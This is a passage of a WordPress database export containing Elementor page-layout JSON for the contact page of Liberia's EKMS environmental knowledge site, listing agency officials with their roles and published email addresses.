href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23284,3379,'_elementor_edit_mode','builder'),(23285,3379,'_elementor_template_type','wp-page'),(23286,3379,'_elementor_version','3.0.16'),(23287,3379,'_wp_page_template','default'),(23288,3379,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br 